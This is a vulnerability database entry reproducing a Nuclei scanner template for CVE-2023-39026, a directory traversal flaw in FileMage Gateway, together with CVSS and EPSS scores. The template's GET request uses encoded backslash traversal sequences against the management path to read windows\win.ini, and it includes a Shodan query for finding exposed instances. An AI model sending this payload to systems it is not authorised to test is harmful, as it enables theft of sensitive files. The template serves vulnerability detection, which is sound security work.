Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-39026
HistoryAug 24, 2023 - 5:40 a.m.

FileMage Gateway - Directory Traversal

2023-08-2405:40:31
ProjectDiscovery
github.com
11
cve2023
packetstorm
lfi
filemage
directory traversal

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.08

Percentile

94.4%

Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
id: CVE-2023-39026

info:
  name: FileMage Gateway - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
  impact: |
    An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
  reference:
    - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
    - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39026
    - https://www.filemage.io/docs/updates.html#change-log
    - http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-39026
    cwe-id: CWE-22
    epss-score: 0.04279
    epss-percentile: 0.92285
    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: windows
    shodan-query:
      - title:"FileMage"
      - cpe:"cpe:2.3:o:microsoft:windows"
  tags: cve2023,cve,packetstorm,lfi,filemage,microsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body,'bit app support','extensions','fonts')"
          - "contains(content_type, 'text/plain')"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450221009395553313e58384aab722806070a0a43add2f31f397edc603d9ddc31c2ddaa802207c5c388fd3f079f0106064a1d8296a16c83f3c09259fe4710bc286dbbc9229a2:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.08

Percentile

94.4%

Related for NUCLEI:CVE-2023-39026